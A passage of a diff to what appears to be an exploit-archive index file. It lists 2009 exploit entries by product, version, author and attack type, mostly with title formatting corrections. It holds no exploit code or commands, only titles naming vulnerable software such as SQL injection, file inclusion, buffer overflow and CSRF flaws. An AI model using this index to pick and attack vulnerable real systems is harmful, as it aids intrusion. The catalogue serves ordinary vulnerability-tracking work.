Overflow",2009-11-16,ryujin,windows,remote,0 +10099,platforms/windows/remote/10099.py,"HP Power Manager Administration Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80 10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 (LIST) Remote Denial of Service Exploit",2007-03-20,shinnai,windows,dos,21 -10101,platforms/php/webapps/10101.txt,"Telepark Wiki v2.4.23 Multiple Remote Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 +10101,platforms/php/webapps/10101.txt,"Telepark Wiki 2.4.23 - Multiple Remote Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit",2009-11-16,"Jeremy Brown",windows,dos,80 10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla Seamonkey 2.0 (jar50.dll) Null Pointer Derefernce",2009-11-16,"Marcin Ressel",windows,dos,0 10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server 'APPE' and 'DELE' Command DoS",2009-11-13,zhangmc,windows,dos,21 @@ -9477,7 +9477,7 @@ id,file,description,date,author,platform,type,port 10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 10107,platforms/windows/local/10107.pl,"Icarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)",2009-11-17,"D3V!L FUCK3R",windows,local,0 10160,platforms/windows/dos/10160.py,"FtpXQ authenticated remote Dos",2009-11-17,"Marc Doudiet",windows,dos,21 -10161,platforms/asp/webapps/10161.txt,"JBS v2.0 | JBSX - Administration panel bypass and Malicious File Upload Vulnerability",2009-11-17,blackenedsecurity,asp,webapps,0 +10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass and File Upload Vulnerability",2009-11-17,blackenedsecurity,asp,webapps,0 10162,platforms/windows/remote/10162.py,"Home FTP Server 'MKD' Command Directory Traversal Vulnerability",2009-11-17,zhangmc,windows,remote,21 10163,platforms/windows/dos/10163.pl,"Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability",2009-11-17,karak0rsan,windows,dos,80 10164,platforms/windows/dos/10164.c,"Kaspersky AV 2010 9.0.0.463 Local DoS",2009-09-29,Heurs,windows,dos,0 @@ -9485,12 +9485,12 @@ id,file,description,date,author,platform,type,port 10166,platforms/asp/webapps/10166.txt,"ActiveTrade 2.0 (default.asp) Blind SQL Injection Vulnerability",2009-11-17,"Hussin X",asp,webapps,0 10167,platforms/asp/webapps/10167.txt,"ActiveBids (default.asp) Blind SQL Injection Vulnerability",2009-11-17,"Hussin X",asp,webapps,0 10168,platforms/php/webapps/10168.txt,"Shoutbox 1.0 HTML / Xss Injection",2009-11-18,"SKuLL-HacKeR ",php,webapps,0 -10169,platforms/php/webapps/10169.txt,"Arbitrary File Download in phpMyBackupPro",2009-11-16,"Amol Naik",php,webapps,0 +10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0 10170,platforms/multiple/webapps/10170.txt,"Xerver 4.31, 4.32 HTTP Response Splitting",2009-11-18,s4squatch,multiple,webapps,80 10171,platforms/windows/dos/10171.py,"Baby Web Server 2.7.2 Vulnerbility found Denial of Service(0day)",2009-11-18,"Asheesh Kumar Mani Tripathi",windows,dos,80 10176,platforms/windows/dos/10176.txt,"HP Openview NNM 7.53 Invalid DB Error Code Vulnerability",2009-11-17,"Core Security",windows,dos,0 10177,platforms/php/webapps/10177.txt,"Joomla Ext. iF Portfolio Nexus SQL injection",2009-11-18,"599eme Man",php,webapps,0 -10178,platforms/php/webapps/10178.txt,"Joomla / Mambo Component com_ezine v2.1 Remote File Include Vulnerability",2009-10-20,kaMtiEz,php,webapps,0 +10178,platforms/php/webapps/10178.txt,"Joomla / Mambo Component com_ezine 2.1 - Remote File Include Vulnerability",2009-10-20,kaMtiEz,php,webapps,0 10180,platforms/php/webapps/10180.txt,"Simplog v0.9.3.2 Mutliple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 Remote File Inclusion Vulnerability",2005-06-15,"Don Tukulesto",php,webapps,0 10182,platforms/hardware/dos/10182.py,"2wire Router <= 5.29.52 Remote DoS",2009-10-29,hkm,hardware,dos,0 @@ -9515,7 +9515,7 @@ id,file,description,date,author,platform,type,port 10211,platforms/windows/local/10211.txt,"Autodesk SoftImage Scene TOC Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10212,platforms/windows/local/10212.txt,"Autodesk 3DS Max Application Callbacks Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10213,platforms/windows/local/10213.txt,"Autodesk Maya Script Nodes Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 -10214,platforms/php/webapps/10214.txt,"Joomla Component mygallery (farbinform_krell) Remote SQL Injection Vulnerability",2009-11-23,"MANAS58 BAYBORA",php,webapps,0 +10214,platforms/php/webapps/10214.txt,"Joomla Component mygallery (farbinform_krell) Remote SQL Injection Vulnerability",2009-11-23,"Manas58 BAYBORA",php,webapps,0 10216,platforms/php/webapps/10216.txt,"KR-Web <= 1.1b2 Remote File Inclusion Vulnerability",2009-11-24,cr4wl3r,php,webapps,0 10217,platforms/php/webapps/10217.txt,"NukeHall <= 0.3 Multiple Remote File Inclusion Vulnerabilities",2009-11-24,cr4wl3r,php,webapps,0 10218,platforms/php/webapps/10218.txt,"Outreach Project Tool <= 1.2.6 Remote File Inclusion Vulnerability",2009-11-24,cr4wl3r,php,webapps,0 @@ -9528,7 +9528,7 @@ id,file,description,date,author,platform,type,port 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.X SQL injection",2006-05-26,KOUSULIN,windows,webapps,1000 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist (.m3u) BOF",2009-11-25,Rick2600,windows,local,0 10227,platforms/php/webapps/10227.txt,"Joomla! 'com_mygallery' Component 'cid' Parameter SQL Injection Vulnerability",2009-11-25,S@BUN,php,webapps,0 -10228,platforms/php/webapps/10228.txt,"Vulnerabilities in WP-Cumulus <= 1.20 for WordPress",2009-11-25,MustLive,php,webapps,0 +10228,platforms/php/webapps/10228.txt,"WordPress WP-Cumulus <= 1.20 - Vulnerabilities",2009-11-25,MustLive,php,webapps,0 10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module 'imageop.crop()' Buffer Overflow Vulnerability",2009-11-24,"Chris Evans",multiple,dos,0 10230,platforms/php/webapps/10230.txt,"Fake Hit Generator <= 2.2 Shell Upload Vulnerability",2009-11-25,DigitALL,php,webapps,0 10231,platforms/php/webapps/10231.txt,"Radio istek scripti 2.5 Remote Configuration Disclosure Vulnerability",2009-11-25,"kurdish hackers team",php,webapps,0 @@ -9568,14 +9568,14 @@ id,file,description,date,author,platform,type,port 10267,platforms/multiple/local/10267.txt,"Oracle ctxsys.drvxtabc.create_tables Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10268,platforms/multiple/local/10268.txt,"Oracle SYS.LT.REMOVEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10269,platforms/windows/remote/10269.html,"Haihaisoft Universal Player 1.4.8.0 'URL' Property ActiveX Buffer Overflow",2009-12-01,shinnai,windows,remote,0 -10272,platforms/php/webapps/10272.txt,"Joomla Joaktree Component v1.0 SQL Injection Vulnerability",2009-12-01,"Don Tukulesto",php,webapps,0 -10273,platforms/php/webapps/10273.txt,"Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities",2009-12-01,kaMtiEz,php,webapps,0 +10272,platforms/php/webapps/10272.txt,"Joomla Joaktree Component 1.0 - SQL Injection Vulnerability",2009-12-01,"Don Tukulesto",php,webapps,0 +10273,platforms/php/webapps/10273.txt,"Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities",2009-12-01,kaMtiEz,php,webapps,0 10274,platforms/php/webapps/10274.txt,"Simple Machines Forum Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0 10275,platforms/php/webapps/10275.txt,"Kide Shoutbox v0.4.6 XSS & AXFR",2009-12-02,andresg888,php,webapps,0 10276,platforms/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router Multiple Vulnerabilities",2009-12-03,DecodeX01,hardware,webapps,0 10277,platforms/php/webapps/10277.txt,"Thatware <= 0.5.3 Multiple Remote File Include Exploit",2009-12-03,cr4wl3r,php,webapps,0 10280,platforms/windows/local/10280.py,"AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF",2009-11-21,mr_me,windows,local,0 -10281,platforms/windows/local/10281.php,"Adobe Illustrator CS4 v14.0.0 Encapsulated Postscript (.eps) Buffer Overflow Exploit",2009-12-03,pyrokinesis,windows,local,0 +10281,platforms/windows/local/10281.php,"Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript (.eps) Buffer Overflow Exploit",2009-12-03,Pyrokinesis,windows,local,0 10282,platforms/linux/remote/10282.py,"OrzHTTPd Format String Exploit",2009-12-03,"Patroklos Argyroudis",linux,remote,80 10284,platforms/php/webapps/10284.txt,"ita-forum 5.1.32 SQL Injection",2009-11-30,Baybora,php,webapps,0 10285,platforms/php/webapps/10285.txt,"Public Media Manager",2009-12-01,cr4wl3r,php,webapps,0 @@ -9585,25 +9585,25 @@ id,file,description,date,author,platform,type,port 10289,platforms/php/webapps/10289.txt,"Power BB 1.8.3 Remote File Includes",2009-11-25,DigitALL,php,webapps,0 10290,platforms/php/webapps/10290.txt,"Theeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps,0 10291,platforms/php/webapps/10291.txt,"Joomla! ProofReader Component 1.0 RC6 Cross-Site Scripting Vulnerability",2009-12-01,MustLive,php,webapps,0 -10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat v3.2.1 404 Error Page Cross Site Scripting Vulnerability",2009-12-01,MustLive,multiple,webapps,0 +10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability",2009-12-01,MustLive,multiple,webapps,0 10293,platforms/php/webapps/10293.txt,"PHP-Nuke <= 8.0 XSS & HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0 -10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support v3.1 Remote File Inclusion Vulnerability",2009-11-24,"Don Tukulesto",php,webapps,0 +10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion Vulnerability",2009-11-24,"Don Tukulesto",php,webapps,0 10295,platforms/windows/local/10295.txt,"DAZ Studio Arbitrary Command Execution",2009-12-03,"Core Security",windows,local,0 10296,platforms/php/local/10296.txt,"PHP 'ini_restore()' Memory Information Disclosure Vulnerability",2009-12-03,"Maksymilian Arciemowicz",php,local,0 10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart (prodid) Remote SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0 -10298,platforms/windows/local/10298.c,"Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (UNIVERSAL)",2009-12-04,"fl0 fl0w",windows,local,0 -10299,platforms/php/webapps/10299.txt,"GeN3 forum V1.3 SQL Injection Vulnerability",2009-12-04,"Dr.0rYX and Cr3w-DZ",php,webapps,0 +10298,platforms/windows/local/10298.c,"Jasc Paint Shop Pro 8 - Local Buffer Overflow Exploit (UNIVERSAL)",2009-12-04,"fl0 fl0w",windows,local,0 +10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection Vulnerability",2009-12-04,"Dr.0rYX and Cr3w-DZ",php,webapps,0 10302,platforms/php/webapps/10302.txt,"427BB Fourtwosevenbb <= 2.3.2 SQL Injection Exploit",2009-12-04,cr4wl3r,php,webapps,0 10303,platforms/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 Denial of Service",2009-12-04,"Mert SARICA",windows,dos,0 -10304,platforms/php/webapps/10304.txt,"Invision Power Board <= 3.0.4 LFI and <=3.0.4 and <=2.3.6 SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 +10304,platforms/php/webapps/10304.txt,"Invision Power Board <= 3.0.4 LFI and <= 3.0.4 and <= 2.3.6 SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 10305,platforms/php/webapps/10305.txt,"UBB.threads 7.5.4 2 Multiple File Inclusion Vulnerabilities",2009-12-04,R3VAN_BASTARD,php,webapps,0 10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0 10307,platforms/php/webapps/10307.txt,"Achievo 1.4.2 Permanent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps,0 -10312,platforms/php/webapps/10312.php,"Joomla 1.5.x com_joomgallery&func Incorrect Flood Filter",2009-12-04,Jbyte,php,webapps,0 +10312,platforms/php/webapps/10312.php,"Joomla 1.5.x com_joomgallery&func Incorrect Flood Filter",2009-12-04,Jbyte,php,webapps,0 10313,platforms/linux/local/10313.c,"libmodplug 's3m' Remote Buffer Overflow Vulnerability",2008-02-25,dummy,linux,local,0 10314,platforms/php/webapps/10314.txt,"BM Classifieds Ads SQL Injection Vulnerability",2009-12-04,"Dr.0rYX and Cr3w-DZ",php,webapps,0 10318,platforms/php/webapps/10318.txt,"Joomla yt_color YOOOtheme XSS and Cookie Stealing",2009-12-04,andresg888,php,webapps,80 -10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 v9.7 Local Buffer Overflow Exploit",2009-12-05,Dr_IDE,windows,local,0 +10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 9.7 - Local Buffer Overflow Exploit",2009-12-05,Dr_IDE,windows,local,0 10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit",2009-12-05,Encrypt3d.M!Nd,windows,local,0 10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit",2009-12-05,Encrypt3d.M!Nd,windows,local,0 10322,platforms/windows/local/10322.py,"Audacity 1.2.6 (gro File) Buffer overflow Exploit",2009-12-05,Encrypt3d.M!Nd,windows,local,0 @@ -9613,9 +9613,9 @@ id,file,description,date,author,platform,type,port 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 'gdevpdtb.c' Buffer Overflow Vulnerability",2009-02-03,"Wolfgang Hamann",multiple,local,0 10327,platforms/multiple/local/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter Denial of Service Vulnerability",2009-04-01,"Red Hat",multiple,local,0 10329,platforms/php/webapps/10329.txt,"AROUNDMe <= 1.1 (language_path) Remote File Include Exploit",2009-12-06,cr4wl3r,php,webapps,0 -10330,platforms/php/webapps/10330.txt,"elkagroup SQL Injection Vulnerability",2009-12-06,SadHaCkEr,php,webapps,0 +10330,platforms/php/webapps/10330.txt,"elkagroup SQL Injection Vulnerability",2009-12-06,SadHaCkEr,php,webapps,0 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server Directory Transversal Vulnerability",2009-12-06,mr_me,windows,webapps,0 -10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 v9.7 Buffer Overflow - MSF Universal",2009-12-06,dookie,windows,local,0 +10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow - MSF Universal",2009-12-06,dookie,windows,local,0 10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC",2009-12-06,Dr_IDE,windows,dos,0 10334,platforms/multiple/dos/10334.py,"VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)",2009-12-06,Dr_IDE,multiple,dos,0 10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (Meta)",2009-12-07,loneferret,windows,local,0 @@ -9625,7 +9625,7 @@ id,file,description,date,author,platform,type,port 10340,platforms/windows/remote/10340.pl,"Multiple Symantec Products Intel Common Base Agent Remote Command Execution",2009-04-28,Kingcope,windows,remote,0 10341,platforms/php/webapps/10341.txt,"SiSplet CMS <= 2008-01-24 Multiple Remote File Include Exploit",2009-12-07,cr4wl3r,php,webapps,0 10343,platforms/windows/dos/10343.txt,"Kingsoft Internet Security 9 Denial of Services",2009-11-05,"Francis Provencher",windows,dos,0 -10344,platforms/windows/local/10344.rb,"Adobe Illustrator CS4 v14.0.0 eps Universal Buffer Overflow (meta)",2009-12-07,dookie,windows,local,0 +10344,platforms/windows/local/10344.rb,"Adobe Illustrator CS4 14.0.0 - eps Universal Buffer Overflow (meta)",2009-12-07,dookie,windows,local,0 10345,platforms/windows/local/10345.py,"gAlan (.galan file) Universal Buffer Overflow Exploit",2009-12-07,Dz_attacker,windows,local,0 10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 Universal Buffer Overflow Exploit (meta)",2009-12-07,loneferret,windows,local,0 10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 Vulnerability",2009-12-07,Global-Evolution,hardware,webapps,0 @@ -9636,27 +9636,27 @@ id,file,description,date,author,platform,type,port 10353,platforms/windows/local/10353.pl,"Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH)",2009-09-24,germaya_x,windows,local,0 10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold persistant XSS vulnerability",2009-12-08,mr_me,php,webapps,0 10356,platforms/php/webapps/10356.txt,"Joomla Component com_job (showMoreUse) SQL injection vulnerability",2009-12-08,Palyo34,php,webapps,0 -10357,platforms/php/webapps/10357.txt,"Alqatari group Version 1.0 <== 5.0 (id) Remote SQL Injection Vulnerability",2009-12-08,Red-D3v1L,php,webapps,0 -10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <== 5.0 (id) Remote SQL Injection Vulnerability",2009-12-08,Red-D3v1L,php,webapps,0 -10359,platforms/windows/local/10359.py,"Audio Workstation v6.4.2.4.0 (.pls) Universal Local BoF Exploit",2009-12-09,mr_me,windows,local,0 +10357,platforms/php/webapps/10357.txt,"Alqatari group Version 1.0 <= 5.0 - (id) Remote SQL Injection Vulnerability",2009-12-08,Red-D3v1L,php,webapps,0 +10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - (id) Remote SQL Injection Vulnerability",2009-12-08,Red-D3v1L,php,webapps,0 +10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - (.pls) Universal Local BoF Exploit",2009-12-09,mr_me,windows,local,0 10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 (Auth Bypass) Remote Sql Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0 10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 (user.ini) Arbitrary Download Vulnerability",2009-12-09,"AnTi SeCuRe",hardware,remote,0 10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 pls Buffer Overflow (meta)",2009-12-09,dookie,windows,local,0 -10364,platforms/php/webapps/10364.txt,"Multiple XSS and Injection Vulnerabilities in TestLink Test Management and Execution System",2009-12-09,"Core Security",php,webapps,0 +10364,platforms/php/webapps/10364.txt,"TestLink Test Management and Execution System - Multiple XSS and Injection Vulnerabilities",2009-12-09,"Core Security",php,webapps,0 10365,platforms/windows/remote/10365.rb,"Eureka Email 2.2q ERR Remote Buffer Overflow Exploit (meta)",2009-12-09,dookie,windows,remote,0 10366,platforms/php/webapps/10366.txt,"Joomla Component com_jsjobs 1.0.5.6 SQL Injection Vulnerabilities",2009-12-10,kaMtiEz,php,webapps,0 10367,platforms/php/webapps/10367.txt,"Joomla Component com_jphoto SQL Injection Vulnerability - (id)",2009-12-10,kaMtiEz,php,webapps,0 10368,platforms/asp/webapps/10368.txt,"Free ASP Upload Shell Upload Vulnerability",2009-12-10,Mr.aFiR,asp,webapps,0 10369,platforms/php/webapps/10369.txt,"Joomla! Mamboleto Component 2.0 RC3 Remote File Include Vulneralbility",2009-12-10,"Don Tukulesto",php,webapps,0 -10370,platforms/php/webapps/10370.txt,"PHP Inventory v1.2 Remote (Auth Bypass) SQL Injection Vulnerabiity",2009-12-10,mr_me,php,webapps,0 +10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Remote (Auth Bypass) SQL Injection Vulnerabiity",2009-12-10,mr_me,php,webapps,0 10371,platforms/windows/local/10371.pl,"Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH)",2009-12-10,germaya_x,windows,local,0 -10372,platforms//webapps/10372.txt,"Blind SQL/XPath injection in OPMANAGER",2009-12-10,"Asheesh Kumar Mani Tripathi",,webapps,0 +10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL/XPath injectio",2009-12-10,"Asheesh Kumar Mani Tripathi",aix,webapps,0 10373,platforms/windows/local/10373.rb,"Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH) (meta)",2009-12-10,"loneferret germaya_x",windows,local,0 10374,platforms/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700",2009-12-10,"Vinod Sharma",windows,local,0 10375,platforms/windows/remote/10375.html,"SAP GUI for Windows sapirrfc.dll Activex Overflow Exploit",2009-12-10,Abysssec,windows,remote,0 -10376,platforms/windows/webapps/10376.txt,"Billwerx RC v3.1 Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80 +10376,platforms/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80 10377,platforms/windows/dos/10377.txt,"IBM SolidDB invalid error code vulnerability",2009-11-18,"Core Security",windows,dos,2315 -10378,platforms/php/webapps/10378.txt,"Remote Code Execution in Nuggetz CMS 1.0",2009-12-10,"Amol Naik",php,webapps,0 +10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0 10379,platforms/php/webapps/10379.txt,"oBlog Persistant XSS, CSRF, Admin Bruteforce",2009-12-11,"Milos Zivanovic",php,webapps,0 10380,platforms/windows/remote/10380.pl,"Sunbird 0.9 Array Overrun (code execution) 0day",2009-12-11,"Maksymilian Arciemowicz and sp3x",windows,remote,0 10383,platforms/php/webapps/10383.txt,"Digital Scribe 1.4.1 Multiple SQL Injection Vulnerabilities",2009-12-11,"Salvatore Fresta",php,webapps,0 @@ -9671,73 +9671,73 @@ id,file,description,date,author,platform,type,port 10394,platforms/windows/remote/10394.py,"HP NNM 7.53 ovalarm.exe CGI Pre Authentication Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 10395,platforms/php/webapps/10395.txt,"Miniweb 2.0 Full Path Disclosure",2009-12-12,"Salvatore Fresta",php,webapps,0 10396,platforms/linux/local/10396.pl,"Mozilla Codesighs Memory Corruption PoC",2009-12-12,"Jeremy Brown",linux,local,0 -10398,platforms/php/webapps/10398.txt,"ZeeCareers v2x - PHP HR Manager Website [ XSS / Auth Bypass ]",2009-12-12,bi0,php,webapps,0 -10400,platforms/php/webapps/10400.txt,"Acc Auto Dealer Script v5.0 Persistent XSS and SQL Backup",2009-12-13,bi0,php,webapps,0 +10398,platforms/php/webapps/10398.txt,"ZeeCareers 2.x - PHP HR Manager Website [ XSS / Auth Bypass ]",2009-12-12,bi0,php,webapps,0 +10400,platforms/php/webapps/10400.txt,"Acc Auto Dealer Script 5.0 - Persistent XSS and SQL Backup",2009-12-13,bi0,php,webapps,0 10401,platforms/php/webapps/10401.txt,"iDesk (download.php cat_id) SQL Injection Vulnerability",2009-12-13,Manas58,php,webapps,0 -10403,platforms/php/webapps/10403.txt,"Uploadscript v1.0. Multiple Vulnerabilities",2009-12-13,Mr.aFiR,php,webapps,0 +10403,platforms/php/webapps/10403.txt,"Uploadscript 1.0 - Multiple Vulnerabilities",2009-12-13,Mr.aFiR,php,webapps,0 10404,platforms/php/webapps/10404.txt,"Interspire Shopping Cart Full Path Disclosure",2009-12-13,Mr.aFiR,php,webapps,0 -10406,platforms/php/webapps/10406.txt,"AccStatistics v1.1 XSRF Vulnerability (Change Admin Settings)",2009-12-13,"Milos Zivanovic ",php,webapps,0 +10406,platforms/php/webapps/10406.txt,"AccStatistics 1.1 - CSRF Vulnerability (Change Admin Settings)",2009-12-13,"Milos Zivanovic",php,webapps,0 10407,platforms/php/webapps/10407.txt,"Joomla Component com_virtuemart SQL injection vulnerability (product_id)",2009-12-13,"SOA Crew",php,webapps,0 -10408,platforms/php/webapps/10408.txt,"SpireCMS v2.0 SQL Injection Vulnerability",2009-12-13,"Dr.0rYX and Cr3w-DZ",php,webapps,0 +10408,platforms/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection Vulnerability",2009-12-13,"Dr.0rYX and Cr3w-DZ",php,webapps,0 10410,platforms/php/webapps/10410.txt,"phpldapadmin Local File Inclusion",2009-12-10,ipsecs,php,webapps,0 -10412,platforms/php/webapps/10412.txt,"Acc PHP eMail v1.1 - CSRF",2009-12-13,bi0,php,webapps,0 +10412,platforms/php/webapps/10412.txt,"Acc PHP eMail 1.1 - CSRF",2009-12-13,bi0,php,webapps,0 10414,platforms/php/webapps/10414.txt,"Frog v0.9.5 CSRF Vulnerability",2009-12-13,"Milos Zivanovic",php,webapps,0 -10417,platforms/php/webapps/10417.txt,"Piwigo v2.0.6 Multiple Vulnerabilities",2009-12-13,mr_me,php,webapps,0 +10417,platforms/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,php,webapps,0 10418,platforms/php/webapps/10418.txt,"Ele Medios CMS SQL Injection Vulnerability",2009-12-13,"Dr.0rYX and Cr3w-DZ",php,webapps,0 -10419,platforms/php/webapps/10419.txt,"Chipmunk Board Script 1.x Multiple XSRF Vulnerabilities",2009-12-13,"Milos Zivanovic",php,webapps,0 +10419,platforms/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple CSRF Vulnerabilities",2009-12-13,"Milos Zivanovic",php,webapps,0 10420,platforms/php/webapps/10420.txt,"Ez Guestbook 1.0 Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic",php,webapps,0 10421,platforms/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10422,platforms/php/webapps/10422.txt,"eoCMS <= 0.9.03 Remote FIle Include Vulnerability",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10423,platforms/windows/local/10423.pl,"RM Downloader 3.0.2.1(.M3U File) Stack Overflow exploit",2009-12-14,"Vinod Sharma",windows,local,0 10424,platforms/multiple/webapps/10424.txt,"Redmine <= 0.8.6 CSRF Add Admin User Exploit",2009-12-14,p0deje,multiple,webapps,0 -10425,platforms/asp/webapps/10425.txt,"Quartz Concept Content Manager V3.00 Auth Bypass",2009-12-14,Mr.aFiR,asp,webapps,0 +10425,platforms/asp/webapps/10425.txt,"Quartz Concept Content Manager 3.00 - Auth Bypass",2009-12-14,Mr.aFiR,asp,webapps,0 10426,platforms/linux/webapps/10426.txt,"[WS] upload Remote File Upload Vulnerability",2009-12-14,ViRuSMaN,linux,webapps,80 10427,platforms/linux/webapps/10427.txt,"DigitalHive Multiple Vulnerabilities",2009-12-14,ViRuSMaN,linux,webapps,80 10428,platforms/windows/webapps/10428.txt,"Maxs AJAX File Uploader Remote File Upload Vulnerability",2009-12-14,ViRuSMaN,windows,webapps,80 10429,platforms/linux/webapps/10429.txt,"myPHPupload 0.5.1 Remote File Upload Vulnerability",2009-12-14,ViRuSMaN,linux,webapps,80 -10430,platforms/linux/webapps/10430.txt,"NAS Uploader [V1.0 and 1.5] Remote File Upload Vulnerability",2009-12-14,ViRuSMaN,linux,webapps,80 +10430,platforms/linux/webapps/10430.txt,"NAS Uploader 1.0 & 1.5 - Remote File Upload Vulnerability",2009-12-14,ViRuSMaN,linux,webapps,80 10431,platforms/multiple/webapps/10431.txt,"Zabbix Agent < 1.6.7 Remote Bypass Vulnerability",2009-12-14,Nicob,multiple,webapps,80 10432,platforms/multiple/webapps/10432.txt,"Zabbix Server Multiple remote vulnerabilities",2009-12-14,Nicob,multiple,webapps,80 -10433,platforms/linux/webapps/10433.txt,"Mail Manager Pro XSRF (Change Admin Password)",2009-12-14,"Milos Zivanovic",linux,webapps,80 +10433,platforms/linux/webapps/10433.txt,"Mail Manager Pro - CSRF (Change Admin Password)",2009-12-14,"Milos Zivanovic",linux,webapps,80 10434,platforms/windows/remote/10434.py,"Savant Web Server 3.1 Remote Buffer Overflow Exploit",2009-12-14,DouBle_Zer0,windows,remote,80 10436,platforms/php/webapps/10436.txt,"Link Up Gold CSRF - Create Administrator Account",2009-12-14,bi0,php,webapps,0 10437,platforms/php/webapps/10437.txt,"Smart PHP Subscriber Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",php,webapps,0 10438,platforms/php/webapps/10438.txt,"AdManagerPro CSRF Create Administrator Account",2009-12-14,bi0,php,webapps,0 -10439,platforms/php/webapps/10439.txt,"Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities",2009-12-14,"Milos Zivanovic",php,webapps,0 +10439,platforms/php/webapps/10439.txt,"Ez Poll Hoster - Multiple XSS and CSRF Vulnerabilities",2009-12-14,"Milos Zivanovic",php,webapps,0 10440,platforms/php/webapps/10440.txt,"Easy Banner Pro - [ CSRF ] Create Administrator Account",2009-12-14,bi0,php,webapps,0 10442,platforms/php/webapps/10442.txt,"Text Exchange Pro - [ CSRF ] Create Administrator Account",2009-12-14,bi0,php,webapps,0 